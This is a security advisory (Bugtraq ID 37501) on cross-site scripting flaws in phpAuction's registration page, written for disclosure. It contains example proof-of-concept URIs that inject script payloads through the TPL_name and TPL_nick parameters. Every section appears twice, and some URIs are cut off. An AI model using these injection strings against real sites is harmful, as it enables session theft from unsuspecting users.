phpAuction Multiple Cross Site Scripting Vulnerabilities
BID:37501
Info
phpAuction Multiple Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 37501 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 26 2009 12:00AM |
| Updated: | Dec 29 2009 11:03PM |
| Credit: | indoushka |
| Vulnerable: |
PHPAuction PHPAuction 0 |
| Not Vulnerable: | |
Discussion
phpAuction Multiple Cross Site Scripting Vulnerabilities
phpAuction is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phpAuction is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Exploit / POC
phpAuction Multiple Cross Site Scripting Vulnerabilities
To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI.
The following example URIs are available:
http://www.example.com/phpauction/register.php?TPL_name=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&TPL_nick=indoushka&[email protected]&[email protected]&[email protected]
http://www.example.com/phpauction/register.php?TPL_name=indoushka&TPL_nick=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(213771818860)%3B%3C/ScRiPt%3E&[email protected]&[email protected]&[email protected]&TP
To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI.
The following example URIs are available:
http://www.example.com/phpauction/register.php?TPL_name=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&TPL_nick=indoushka&[email protected]&[email protected]&[email protected]
http://www.example.com/phpauction/register.php?TPL_name=indoushka&TPL_nick=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(213771818860)%3B%3C/ScRiPt%3E&[email protected]&[email protected]&[email protected]&TP
Solution / Fix
phpAuction Multiple Cross Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
phpAuction Multiple Cross Site Scripting Vulnerabilities
References:
References:
- phpAuction.net Homepage (phpAuction.net)